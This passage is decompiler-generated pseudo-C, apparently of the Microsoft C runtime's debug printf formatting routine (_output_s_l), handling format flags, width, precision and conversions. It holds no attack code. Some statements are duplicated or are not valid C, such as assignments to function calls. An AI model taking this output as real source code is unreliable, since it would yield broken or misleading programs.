																			asm("int3");
																		}
																	}
																	L22:
																	__eflags =  *(_t557 - 0x27c);
																	if( *(_t557 - 0x27c) != 0) {
																		goto L24;
																	} else {
																		 *((intOrPtr*)(L00411810(_t541))) = 0x16;
																		E0040C660(_t528, _t541, _t555, _t556, L"(ch != _T(\'\\0\'))", L"_output_s_l", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x486, 0);
																		 *(_t557 - 0x2f4) = 0xffffffff;
																		E00410370(_t557 - 0x40);
																		_t499 =  *(_t557 - 0x2f4);
																		goto L229;
																	}
																}
															case 1:
																L25:
																 *(__ebp - 0x2c) = 0;
																__edx =  *(__ebp - 0x2c);
																 *(__ebp - 0x28) =  *(__ebp - 0x2c);
																__eax =  *(__ebp - 0x28);
																 *(__ebp - 0x18) =  *(__ebp - 0x28);
																__ecx =  *(__ebp - 0x18);
																 *(__ebp - 0x1c) = __ecx;
																 *(__ebp - 0x10) = 0;
																 *(__ebp - 0x30) = 0xffffffff;
																 *(__ebp - 0xc) = 0;
																goto L218;
															case 2:
																L26:
																__edx =  *((char*)(__ebp - 0x251));
																 *(__ebp - 0x31c) =  *((char*)(__ebp - 0x251));
																 *(__ebp - 0x31c) =  *(__ebp - 0x31c) - 0x20;
																 *(__ebp - 0x31c) =  *(__ebp - 0x31c) - 0x20;
																__eflags =  *(__ebp - 0x31c) - 0x10;
																if( *(__ebp - 0x31c) > 0x10) {
																	goto L33;
																}
																L27:
																__ecx =  *(__ebp - 0x31c);
																_t72 = __ecx + 0x422ae8; // 0x498d04
																__edx =  *_t72 & 0x000000ff;
																switch( *((intOrPtr*)(( *_t72 & 0x000000ff) * 4 +  &M00422AD0))) {
																	case 0:
																		goto L30;
																	case 1:
																		goto L31;
																	case 2:
																		goto L29;
																	case 3:
																		goto L28;
																	case 4:
																		goto L32;
																	case 5:
																		goto L33;
																}
															case 3:
																L34:
																__edx =  *((char*)(__ebp - 0x251));
																__eflags =  *((char*)(__ebp - 0x251)) - 0x2a;
																if( *((char*)(__ebp - 0x251)) != 0x2a) {
																	__eax =  *(__ebp - 0x18);
																	__eax =  *(__ebp - 0x18) * 0xa;
																	__eflags = __eax;
																	__ecx =  *((char*)(__ebp - 0x251));
																	_t96 = __ecx - 0x30; // -48
																	__edx = __eax + _t96;
																	 *(__ebp - 0x18) = __eax + _t96;
																} else {
																	__eax = __ebp + 0x14;
																	 *(__ebp - 0x18) = E0041F270(__ebp + 0x14);
																	__eflags =  *(__ebp - 0x18);
																	if( *(__ebp - 0x18) < 0) {
																		__ecx =  *(__ebp - 0x10);
																		__ecx =  *(__ebp - 0x10) | 0x00000004;
																		__eflags = __ecx;
																		 *(__ebp - 0x10) = __ecx;
																		 *(__ebp - 0x18) =  ~( *(__ebp - 0x18));
																		 *(__ebp - 0x18) =  ~( *(__ebp - 0x18));
																	}
																}
																goto L218;
															case 4:
																L40:
																 *(__ebp - 0x30) = 0;
																goto L218;
															case 5:
																L41:
																__eax =  *((char*)(__ebp - 0x251));
																__eflags =  *((char*)(__ebp - 0x251)) - 0x2a;
																if( *((char*)(__ebp - 0x251)) != 0x2a) {
																	__edx =  *(__ebp - 0x30);
																	__edx =  *(__ebp - 0x30) * 0xa;
																	__eflags = __edx;
																	_t107 =  *((char*)(__ebp - 0x251)) - 0x30; // -48
																	__ecx = __edx + _t107;
																	 *(__ebp - 0x30) = __ecx;
																} else {
																	__ecx = __ebp + 0x14;
																	 *(__ebp - 0x30) = E0041F270(__ebp + 0x14);
																	__eflags =  *(__ebp - 0x30);
																	if( *(__ebp - 0x30) < 0) {
																		 *(__ebp - 0x30) = 0xffffffff;
																	}
																}
																goto L218;
															case 6:
																L47:
																__edx =  *((char*)(__ebp - 0x251));
																 *(__ebp - 0x320) =  *((char*)(__ebp - 0x251));
																 *(__ebp - 0x320) =  *(__ebp - 0x320) - 0x49;
																 *(__ebp - 0x320) =  *(__ebp - 0x320) - 0x49;
																__eflags =  *(__ebp - 0x320) - 0x2e;
																if( *(__ebp - 0x320) > 0x2e) {
																	L70:
																	goto L218;
																}
																L48:
																__ecx =  *(__ebp - 0x320);
																_t115 = __ecx + 0x422b10; // 0x231e9003
																__edx =  *_t115 & 0x000000ff;
																switch( *((intOrPtr*)(( *_t115 & 0x000000ff) * 4 +  &M00422AFC))) {
																	case 0:
																		L53:
																		__edx =  *(__ebp + 0xc);
																		__eax =  *( *(__ebp + 0xc));
																		__eflags =  *( *(__ebp + 0xc)) - 0x36;
																		if( *( *(__ebp + 0xc)) != 0x36) {
																			L56:
																			__edx =  *(__ebp + 0xc);
																			__eax =  *( *(__ebp + 0xc));
																			__eflags =  *( *(__ebp + 0xc)) - 0x33;
																			if( *( *(__ebp + 0xc)) != 0x33) {
																				L59:
																				__edx =  *(__ebp + 0xc);
																				__eax =  *( *(__ebp + 0xc));
																				__eflags =  *( *(__ebp + 0xc)) - 0x64;
																				if( *( *(__ebp + 0xc)) == 0x64) {
																					L65:
																					L67:
																					goto L70;
																				}
																				L60:
																				__ecx =  *(__ebp + 0xc);
																				__edx =  *__ecx;
																				__eflags =  *__ecx - 0x69;
																				if( *__ecx == 0x69) {
																					goto L65;
																				}
																				L61:
																				__eax =  *(__ebp + 0xc);
																				__ecx =  *( *(__ebp + 0xc));
																				__eflags = __ecx - 0x6f;
																				if(__ecx == 0x6f) {
																					goto L65;
																				}
																				L62:
																				__edx =  *(__ebp + 0xc);
																				__eax =  *( *(__ebp + 0xc));
																				__eflags =  *( *(__ebp + 0xc)) - 0x75;
																				if( *( *(__ebp + 0xc)) == 0x75) {
																					goto L65;
																				}
																				L63:
																				__ecx =  *(__ebp + 0xc);
																				__edx =  *__ecx;
																				__eflags =  *__ecx - 0x78;
																				if( *__ecx == 0x78) {
																					goto L65;
																				}
																				L64:
																				__eax =  *(__ebp + 0xc);
																				__ecx =  *( *(__ebp + 0xc));
																				__eflags = __ecx - 0x58;
																				if(__ecx != 0x58) {
																					 *(__ebp - 0x25c) = 0;
																					goto L18;
																				}
																				goto L65;
																			}
																			L57:
																			__ecx =  *(__ebp + 0xc);
																			__edx =  *((char*)(__ecx + 1));
																			__eflags =  *((char*)(__ecx + 1)) - 0x32;
																			if( *((char*)(__ecx + 1)) != 0x32) {
																				goto L59;
																			} else {
																				 *(__ebp + 0xc) =  *(__ebp + 0xc) + 2;
																				 *(__ebp + 0xc) =  *(__ebp + 0xc) + 2;
																				__ecx =  *(__ebp - 0x10);
																				__ecx =  *(__ebp - 0x10) & 0xffff7fff;
																				 *(__ebp - 0x10) = __ecx;
																				goto L67;
																			}
																		}
																		L54:
																		__ecx =  *(__ebp + 0xc);
																		__edx =  *((char*)(__ecx + 1));
																		__eflags =  *((char*)(__ecx + 1)) - 0x34;
																		if( *((char*)(__ecx + 1)) != 0x34) {
																			goto L56;
																		} else {
																			 *(__ebp + 0xc) =  *(__ebp + 0xc) + 2;
																			 *(__ebp + 0xc) =  *(__ebp + 0xc) + 2;
																			__ecx =  *(__ebp - 0x10);
																			__ecx =  *(__ebp - 0x10) | 0x00008000;
																			 *(__ebp - 0x10) = __ecx;
																			goto L67;
																		}
																	case 1:
																		L68:
																		 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000020;
																		 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000020;
																		goto L70;
																	case 2:
																		L49:
																		__eax =  *(__ebp + 0xc);
																		__ecx =  *( *(__ebp + 0xc));
																		__eflags = __ecx - 0x6c;
																		if(__ecx != 0x6c) {
																			__ecx =  *(__ebp - 0x10);
																			__ecx =  *(__ebp - 0x10) | 0x00000010;
																			__eflags = __ecx;
																			 *(__ebp - 0x10) = __ecx;
																		} else {
																			 *(__ebp + 0xc) =  *(__ebp + 0xc) + 1;
																			 *(__ebp + 0xc) =  *(__ebp + 0xc) + 1;
																			 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00001000;
																			 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00001000;
																		}
																		goto L70;
																	case 3:
																		L69:
																		__eax =  *(__ebp - 0x10);
																		__eax =  *(__ebp - 0x10) | 0x00000800;
																		__eflags = __eax;
																		 *(__ebp - 0x10) = __eax;
																		goto L70;
																	case 4:
																		goto L70;
																}
															case 7:
																L71:
																__ecx =  *((char*)(__ebp - 0x251));
																 *(__ebp - 0x324) = __ecx;
																 *(__ebp - 0x324) =  *(__ebp - 0x324) - 0x41;
																 *(__ebp - 0x324) =  *(__ebp - 0x324) - 0x41;
																__eflags =  *(__ebp - 0x324) - 0x37;
																if( *(__ebp - 0x324) > 0x37) {
																	while(1) {
																		L190:
																		__eflags =  *(__ebp - 0x28);
																		if( *(__ebp - 0x28) != 0) {
																			goto L216;
																		}
																		goto L191;
																	}
																}
																L72:
																_t156 =  *(__ebp - 0x324) + 0x422b7c; // 0xcccccc0d
																__ecx =  *_t156 & 0x000000ff;
																switch( *((intOrPtr*)(__ecx * 4 +  &M00422B40))) {
																	case 0:
																		L123:
																		 *(__ebp - 0x2c) = 1;
																		__ecx =  *((char*)(__ebp - 0x251));
																		__ecx =  *((char*)(__ebp - 0x251)) + 0x20;
																		__eflags = __ecx;
																		 *((char*)(__ebp - 0x251)) = __cl;
																		goto L124;
																	case 1:
																		L73:
																		 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000830;
																		__eflags =  *(__ebp - 0x10) & 0x00000830;
																		if(( *(__ebp - 0x10) & 0x00000830) == 0) {
																			__eax =  *(__ebp - 0x10);
																			__eax =  *(__ebp - 0x10) | 0x00000800;
																			__eflags = __eax;
																			 *(__ebp - 0x10) = __eax;
																		}
																		goto L75;
																	case 2:
																		L88:
																		 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000830;
																		__eflags =  *(__ebp - 0x10) & 0x00000830;
																		if(( *(__ebp - 0x10) & 0x00000830) == 0) {
																			__ecx =  *(__ebp - 0x10);
																			__ecx =  *(__ebp - 0x10) | 0x00000800;
																			__eflags = __ecx;
																			 *(__ebp - 0x10) = __ecx;
																		}
																		goto L90;
																	case 3:
																		L147:
																		 *(__ebp - 0x260) = 7;
																		L148:
																		 *(__ebp - 8) = 0x10;
																		 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
																		__eflags =  *(__ebp - 0x10) & 0x00000080;
																		if(( *(__ebp - 0x10) & 0x00000080) != 0) {
																			 *(__ebp - 0x14) = 0x30;
																			 *(__ebp - 0x260) =  *(__ebp - 0x260) + 0x51;
																			__eflags =  *(__ebp - 0x260) + 0x51;
																			 *((char*)(__ebp - 0x13)) = __al;
																			 *(__ebp - 0x1c) = 2;
																		}
																		goto L153;
																	case 4:
																		L81:
																		__eax = __ebp + 0x14;
																		 *(__ebp - 0x288) = E0041F270(__ebp + 0x14);
																		__eflags =  *(__ebp - 0x288);
																		if( *(__ebp - 0x288) == 0) {
																			L83:
																			__edx =  *0x4bc060; // 0x408114
																			 *(__ebp - 4) = __edx;
																			__eax =  *(__ebp - 4);
																			 *(__ebp - 0x24) = E00410910( *(__ebp - 4));
																			L87:
																			goto L190;
																		}
																		L82:
																		__ecx =  *(__ebp - 0x288);
																		__eflags =  *(__ecx + 4);
																		if( *(__ecx + 4) != 0) {
																			L84:
																			 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000800;
																			__eflags =  *(__ebp - 0x10) & 0x00000800;
																			if(( *(__ebp - 0x10) & 0x00000800) == 0) {
																				 *(__ebp - 0xc) = 0;
																				__edx =  *(__ebp - 0x288);
																				__eax =  *(__edx + 4);
																				 *(__ebp - 4) =  *(__edx + 4);
																				__ecx =  *(__ebp - 0x288);
																				__edx =  *__ecx;
																				 *(__ebp - 0x24) =  *__ecx;
																			} else {
																				__edx =  *(__ebp - 0x288);
																				__eax =  *(__edx + 4);
																				 *(__ebp - 4) =  *(__edx + 4);
																				__ecx =  *(__ebp - 0x288);
																				__eax =  *__ecx;
																				asm("cdq");
																				 *__ecx - __edx =  *__ecx - __edx >> 1;
																				 *(__ebp - 0x24) =  *__ecx - __edx >> 1;
																				 *(__ebp - 0xc) = 1;
																			}
																			goto L87;
																		}
																		goto L83;
																	case 5:
																		L124:
																		 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000040;
																		 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000040;
																		__eax = __ebp - 0x248;
																		 *(__ebp - 4) = __ebp - 0x248;
																		 *(__ebp - 0x44) = 0x200;
																		__eflags =  *(__ebp - 0x30);
																		if( *(__ebp - 0x30) >= 0) {
																			L126:
																			__eflags =  *(__ebp - 0x30);
																			if( *(__ebp - 0x30) != 0) {
																				L129:
																				__eflags =  *(__ebp - 0x30) - 0x200;
																				if( *(__ebp - 0x30) > 0x200) {
																					 *(__ebp - 0x30) = 0x200;
																				}
																				L131:
																				__eflags =  *(__ebp - 0x30) - 0xa3;
																				if( *(__ebp - 0x30) > 0xa3) {
																					 *(__ebp - 0x30) =  *(__ebp - 0x30) + 0x15d;
																					 *(__ebp - 0x20) = L0040E5B0(__ecx,  *(__ebp - 0x30) + 0x15d, 2, "f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x6da);
																					__eflags =  *(__ebp - 0x20);
																					if( *(__ebp - 0x20) == 0) {
																						 *(__ebp - 0x30) = 0xa3;
																					} else {
																						__eax =  *(__ebp - 0x20);
																						 *(__ebp - 4) =  *(__ebp - 0x20);
																						 *(__ebp - 0x30) =  *(__ebp - 0x30) + 0x15d;
																						 *(__ebp - 0x44) =  *(__ebp - 0x30) + 0x15d;
																					}
																				}
																				 *(__ebp + 0x14) =  *(__ebp + 0x14) + 8;
																				 *(__ebp + 0x14) =  *(__ebp + 0x14) + 8;
																				__eax =  *(__ebp + 0x14);
																				__ecx =  *(__eax - 8);
																				__edx =  *(__eax - 4);
																				 *(__ebp - 0x2a8) =  *(__eax - 8);
																				 *(__ebp - 0x2a4) =  *(__eax - 4);
																				__ecx = __ebp - 0x40;
																				_push(E004103A0(__ebp - 0x40));
																				__eax =  *(__ebp - 0x2c);
																				_push( *(__ebp - 0x2c));
																				__ecx =  *(__ebp - 0x30);
																				_push( *(__ebp - 0x30));
																				__edx =  *((char*)(__ebp - 0x251));
																				_push( *((char*)(__ebp - 0x251)));
																				__eax =  *(__ebp - 0x44);
																				_push( *(__ebp - 0x44));
																				__ecx =  *(__ebp - 4);
																				_push( *(__ebp - 4));
																				__edx = __ebp - 0x2a8;
																				_push(__ebp - 0x2a8);
																				__eax =  *0x4bb808; // 0x776010b9
																				__eax =  *__eax();
																				__esp = __esp + 0x1c;
																				 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
																				__eflags =  *(__ebp - 0x10) & 0x00000080;
																				if(( *(__ebp - 0x10) & 0x00000080) != 0) {
																					__eflags =  *(__ebp - 0x30);
																					if( *(__ebp - 0x30) == 0) {
																						__ecx = __ebp - 0x40;
																						_push(E004103A0(__ebp - 0x40));
																						__edx =  *(__ebp - 4);
																						_push( *(__ebp - 4));
																						__eax =  *0x4bb814; // 0x776010b9
																						__eax =  *__eax();
																						__esp = __esp + 8;
																					}
																				}
																				__ecx =  *((char*)(__ebp - 0x251));
																				__eflags =  *((char*)(__ebp - 0x251)) - 0x67;
																				if( *((char*)(__ebp - 0x251)) == 0x67) {
																					 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
																					__eflags =  *(__ebp - 0x10) & 0x00000080;
																					if(( *(__ebp - 0x10) & 0x00000080) == 0) {
																						__ecx = __ebp - 0x40;
																						_push(E004103A0(__ebp - 0x40));
																						__eax =  *(__ebp - 4);
																						_push( *(__ebp - 4));
																						__ecx =  *0x4bb810; // 0x776010b9
																						E00411D00(__ecx) =  *__eax();
																						__esp = __esp + 8;
																					}
																				}
																				__edx =  *(__ebp - 4);
																				__eax =  *( *(__ebp - 4));
																				__eflags =  *( *(__ebp - 4)) - 0x2d;
																				if( *( *(__ebp - 4)) == 0x2d) {
																					 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000100;
																					 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000100;
																					__edx =  *(__ebp - 4);
																					__edx =  *(__ebp - 4) + 1;
																					__eflags = __edx;
																					 *(__ebp - 4) = __edx;
																				}
																				__eax =  *(__ebp - 4);
																				 *(__ebp - 0x24) = E00410910( *(__ebp - 4));
																				do {
																					L190:
																					__eflags =  *(__ebp - 0x28);
																					if( *(__ebp - 0x28) != 0) {
																						goto L216;
																					}
																					goto L191;
																				} while ( *(__ebp - 0x324) > 0x37);
																				goto L72;
																			}
																			L127:
																			__ecx =  *((char*)(__ebp - 0x251));
																			__eflags = __ecx - 0x67;
																			if(__ecx != 0x67) {
																				goto L129;
																			}
																			L128:
																			 *(__ebp - 0x30) = 1;
																			goto L131;
																		}
																		L125:
																		 *(__ebp - 0x30) = 6;
																		goto L131;
																	case 6:
																		L75:
																		 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000810;
																		__eflags =  *(__ebp - 0x10) & 0x00000810;
																		if(( *(__ebp - 0x10) & 0x00000810) == 0) {
																			__ebp + 0x14 = E0041F270(__ebp + 0x14);
																			 *(__ebp - 0x284) = __ax;
																			__cl =  *(__ebp - 0x284);
																			 *(__ebp - 0x248) = __cl;
																			 *(__ebp - 0x24) = 1;
																		} else {
																			 *(__ebp - 0x280) = 0;
																			__edx = __ebp + 0x14;
																			__eax = E00421650(__ebp + 0x14);
																			 *(__ebp - 0x258) = __ax;
																			__eax =  *(__ebp - 0x258) & 0x0000ffff;
																			__ecx = __ebp - 0x248;
																			__edx = __ebp - 0x24;
																			 *(__ebp - 0x280) = E00424E90(__ebp - 0x24, __ebp - 0x248, 0x200,  *(__ebp - 0x258) & 0x0000ffff);
																			__eflags =  *(__ebp - 0x280);
																			if( *(__ebp - 0x280) != 0) {
																				 *(__ebp - 0x28) = 1;
																			}
																		}
																		__edx = __ebp - 0x248;
																		 *(__ebp - 4) = __ebp - 0x248;
																		while(1) {
																			L190:
																			__eflags =  *(__ebp - 0x28);
																			if( *(__ebp - 0x28) != 0) {
																				goto L216;
																			}
																			goto L191;
																		}
																	case 7:
																		L144:
																		 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000040;
																		 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000040;
																		 *(__ebp - 8) = 0xa;
																		L153:
																		 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00008000;
																		__eflags =  *(__ebp - 0x10) & 0x00008000;
																		if(( *(__ebp - 0x10) & 0x00008000) == 0) {
																			 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00001000;
																			__eflags =  *(__ebp - 0x10) & 0x00001000;
																			if(( *(__ebp - 0x10) & 0x00001000) == 0) {
																				 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000020;
																				__eflags =  *(__ebp - 0x10) & 0x00000020;
																				if(( *(__ebp - 0x10) & 0x00000020) == 0) {
																					 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
																					__eflags =  *(__ebp - 0x10) & 0x00000040;
																					if(( *(__ebp - 0x10) & 0x00000040) == 0) {
																						__ecx = __ebp + 0x14;
																						__eax = E0041F270(__ebp + 0x14);
																						__edx = 0;
																						__eflags = 0;
																						 *(__ebp - 0x2b8) = __eax;
																						 *(__ebp - 0x2b4) = 0;
																					} else {
																						__eax = __ebp + 0x14;
																						__eax = E0041F270(__ebp + 0x14);
																						asm("cdq");
																						 *(__ebp - 0x2b8) = __eax;
																						 *(__ebp - 0x2b4) = __edx;
																					}
																				} else {
																					 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
																					__eflags =  *(__ebp - 0x10) & 0x00000040;
																					if(( *(__ebp - 0x10) & 0x00000040) == 0) {
																						__ecx = __ebp + 0x14;
																						E0041F270(__ebp + 0x14) = __ax & 0x0000ffff;
																						asm("cdq");
																						 *(__ebp - 0x2b8) = __ax & 0x0000ffff;
																						 *(__ebp - 0x2b4) = __edx;
																					} else {
																						__eax = __ebp + 0x14;
																						__eax = E0041F270(__ebp + 0x14);
																						__ax = __eax;
																						asm("cdq");
																						 *(__ebp - 0x2b8) = __eax;
																						 *(__ebp - 0x2b4) = __edx;
																					}
																				}
																			} else {
																				__eax = __ebp + 0x14;
																				 *(__ebp - 0x2b8) = E0041F290(__ebp + 0x14);
																				 *(__ebp - 0x2b4) = __edx;
																			}
																		} else {
																			__ecx = __ebp + 0x14;
																			 *(__ebp - 0x2b8) = E0041F290(__ebp + 0x14);
																			 *(__ebp - 0x2b4) = __edx;
																		}
																		 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
																		__eflags =  *(__ebp - 0x10) & 0x00000040;
																		if(( *(__ebp - 0x10) & 0x00000040) == 0) {
																			goto L170;
																		}
																	case 8:
																		L109:
																		__ecx = __ebp + 0x14;
																		 *(__ebp - 0x298) = E0041F270(__ebp + 0x14);
																		__eax = E00424120();
																		__eflags = __eax;
																		if(__eax != 0) {
																			L119:
																			 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000020;
																			__eflags =  *(__ebp - 0x10) & 0x00000020;
																			if(( *(__ebp - 0x10) & 0x00000020) == 0) {
																				__edx =  *(__ebp - 0x298);
																				__eax =  *(__ebp - 0x24c);
																				 *( *(__ebp - 0x298)) =  *(__ebp - 0x24c);
																			} else {
																				__eax =  *(__ebp - 0x298);
																				 *( *(__ebp - 0x298)) =  *(__ebp - 0x24c);
																			}
																			 *(__ebp - 0x28) = 1;
																			while(1) {
																				L190:
																				__eflags =  *(__ebp - 0x28);
																				if( *(__ebp - 0x28) != 0) {
																					goto L216;
																				}
																				goto L191;
																			}
																		}
																		L110:
																		__edx = 0;
																		__eflags = 0;
																		if(0 == 0) {
																			 *(__ebp - 0x32c) = 0;
																		} else {
																			 *(__ebp - 0x32c) = 1;
																		}
																		__eax =  *(__ebp - 0x32c);
																		 *(__ebp - 0x29c) =  *(__ebp - 0x32c);
																		__eflags =  *(__ebp - 0x29c);
																		if( *(__ebp - 0x29c) == 0) {
																			_push(L"(\"\'n\' format specifier disabled\", 0)");
																			_push(0);
																			_push(0x695);
																			_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c");
																			_push(2);
																			__eax = L0040C820();
																			__esp = __esp + 0x14;
																			__eflags = __eax - 1;
																			if(__eax == 1) {
																				asm("int3");
																			}
																		}
																		__eflags =  *(__ebp - 0x29c);
																		if( *(__ebp - 0x29c) != 0) {
																			L118:
																			while(1) {
																				L190:
																				__eflags =  *(__ebp - 0x28);
																				if( *(__ebp - 0x28) != 0) {
																					goto L216;
																				}
																				goto L191;
																			}
																		} else {
																			L117:
																			 *((intOrPtr*)(L00411810(__ecx))) = 0x16;
																			__eax = E0040C660(__ebx, __ecx, __edi, __esi, L"(\"\'n\' format specifier disabled\", 0)", L"_output_s_l", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x695, 0);
																			 *(__ebp - 0x2f8) = 0xffffffff;
																			__ecx = __ebp - 0x40;
																			__eax = E00410370(__ecx);
																			__eax =  *(__ebp - 0x2f8);
																			goto L229;
																		}
																	case 9:
																		L151:
																		 *(__ebp - 8) = 8;
																		 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
																		__eflags =  *(__ebp - 0x10) & 0x00000080;
																		if(( *(__ebp - 0x10) & 0x00000080) != 0) {
																			__edx =  *(__ebp - 0x10);
																			__edx =  *(__ebp - 0x10) | 0x00000200;
																			__eflags = __edx;
																			 *(__ebp - 0x10) = __edx;
																		}
																		while(1) {
																			L153:
																			 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00008000;
																			__eflags =  *(__ebp - 0x10) & 0x00008000;
																			if(( *(__ebp - 0x10) & 0x00008000) == 0) {
																				 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00001000;
																				__eflags =  *(__ebp - 0x10) & 0x00001000;
																				if(( *(__ebp - 0x10) & 0x00001000) == 0) {
																					 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000020;
																					__eflags =  *(__ebp - 0x10) & 0x00000020;
																					if(( *(__ebp - 0x10) & 0x00000020) == 0) {
																						 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
																						__eflags =  *(__ebp - 0x10) & 0x00000040;
																						if(( *(__ebp - 0x10) & 0x00000040) == 0) {
																							__ecx = __ebp + 0x14;
																							__eax = E0041F270(__ebp + 0x14);
																							__edx = 0;
																							__eflags = 0;
																							 *(__ebp - 0x2b8) = __eax;
																							 *(__ebp - 0x2b4) = 0;
																						} else {
																							__eax = __ebp + 0x14;
																							__eax = E0041F270(__ebp + 0x14);
																							asm("cdq");
																							 *(__ebp - 0x2b8) = __eax;
																							 *(__ebp - 0x2b4) = __edx;
																						}
																					} else {
																						 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
																						__eflags =  *(__ebp - 0x10) & 0x00000040;
																						if(( *(__ebp - 0x10) & 0x00000040) == 0) {
																							__ecx = __ebp + 0x14;
																							E0041F270(__ebp + 0x14) = __ax & 0x0000ffff;
																							asm("cdq");
																							 *(__ebp - 0x2b8) = __ax & 0x0000ffff;
																							 *(__ebp - 0x2b4) = __edx;
																						} else {
																							__eax = __ebp + 0x14;
																							__eax = E0041F270(__ebp + 0x14);
																							__ax = __eax;
																							asm("cdq");
																							 *(__ebp - 0x2b8) = __eax;
																							 *(__ebp - 0x2b4) = __edx;
																						}
																					}
																				} else {
																					__eax = __ebp + 0x14;
																					 *(__ebp - 0x2b8) = E0041F290(__ebp + 0x14);
																					 *(__ebp - 0x2b4) = __edx;
																				}
																			} else {
																				__ecx = __ebp + 0x14;
																				 *(__ebp - 0x2b8) = E0041F290(__ebp + 0x14);
																				 *(__ebp - 0x2b4) = __edx;
																			}
																			 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
																			__eflags =  *(__ebp - 0x10) & 0x00000040;
																			if(( *(__ebp - 0x10) & 0x00000040) == 0) {
																				goto L170;
																			}
																			goto L166;
																		}
																	case 0xa:
																		L146:
																		 *(__ebp - 0x30) = 8;
																		goto L147;
																	case 0xb:
																		L90:
																		__eflags =  *(__ebp - 0x30) - 0xffffffff;
																		if( *(__ebp - 0x30) != 0xffffffff) {
																			__edx =  *(__ebp - 0x30);
																			 *(__ebp - 0x328) =  *(__ebp - 0x30);
																		} else {
																			 *(__ebp - 0x328) = 0x7fffffff;
																		}
																		__eax =  *(__ebp - 0x328);
																		 *(__ebp - 0x290) =  *(__ebp - 0x328);
																		__ecx = __ebp + 0x14;
																		 *(__ebp - 4) = E0041F270(__ebp + 0x14);
																		 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000810;
																		__eflags =  *(__ebp - 0x10) & 0x00000810;
																		if(( *(__ebp - 0x10) & 0x00000810) == 0) {
																			L101:
																			__eflags =  *(__ebp - 4);
																			if( *(__ebp - 4) == 0) {
																				__edx =  *0x4bc060; // 0x408114
																				 *(__ebp - 4) = __edx;
																			}
																			__eax =  *(__ebp - 4);
																			 *(__ebp - 0x28c) =  *(__ebp - 4);
																			while(1) {
																				L104:
																				__ecx =  *(__ebp - 0x290);
																				 *(__ebp - 0x290) =  *(__ebp - 0x290) - 1;
																				 *(__ebp - 0x290) =  *(__ebp - 0x290) - 1;
																				__eflags = __ecx;
																				if(__ecx == 0) {
																					break;
																				}
																				L105:
																				__eax =  *(__ebp - 0x28c);
																				__ecx =  *( *(__ebp - 0x28c));
																				__eflags = __ecx;
																				if(__ecx == 0) {
																					break;
																				}
																				L106:
																				 *(__ebp - 0x28c) =  *(__ebp - 0x28c) + 1;
																				 *(__ebp - 0x28c) =  *(__ebp - 0x28c) + 1;
																			}
																			L107:
																			__eax =  *(__ebp - 0x28c);
																			__eax =  *(__ebp - 0x28c) -  *(__ebp - 4);
																			__eflags = __eax;
																			 *(__ebp - 0x24) = __eax;
																			goto L108;
																		} else {
																			L94:
																			__eflags =  *(__ebp - 4);
																			if( *(__ebp - 4) == 0) {
																				__eax =  *0x4bc064; // 0x408104
																				 *(__ebp - 4) = __eax;
																			}
																			 *(__ebp - 0xc) = 1;
																			__ecx =  *(__ebp - 4);
																			 *(__ebp - 0x294) =  *(__ebp - 4);
																			while(1) {
																				L97:
																				__edx =  *(__ebp - 0x290);
																				 *(__ebp - 0x290) =  *(__ebp - 0x290) - 1;
																				 *(__ebp - 0x290) =  *(__ebp - 0x290) - 1;
																				__eflags =  *(__ebp - 0x290);
																				if( *(__ebp - 0x290) == 0) {
																					break;
																				}
																				L98:
																				__ecx =  *(__ebp - 0x294);
																				__edx =  *( *(__ebp - 0x294)) & 0x0000ffff;
																				__eflags =  *( *(__ebp - 0x294)) & 0x0000ffff;
																				if(( *( *(__ebp - 0x294)) & 0x0000ffff) == 0) {
																					break;
																				}
																				L99:
																				 *(__ebp - 0x294) =  *(__ebp - 0x294) + 2;
																				 *(__ebp - 0x294) =  *(__ebp - 0x294) + 2;
																			}
																			L100:
																			 *(__ebp - 0x294) =  *(__ebp - 0x294) -  *(__ebp - 4);
																			__ecx =  *(__ebp - 0x294) -  *(__ebp - 4) >> 1;
																			 *(__ebp - 0x24) = __ecx;
																			L108:
																			while(1) {
																				L190:
																				__eflags =  *(__ebp - 0x28);
																				if( *(__ebp - 0x28) != 0) {
																					goto L216;
																				}
																				goto L191;
																			}
																		}
																	case 0xc:
																		L145:
																		 *(__ebp - 8) = 0xa;
																		while(1) {
																			L153:
																			 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00008000;
																			__eflags =  *(__ebp - 0x10) & 0x00008000;
																			if(( *(__ebp - 0x10) & 0x00008000) == 0) {
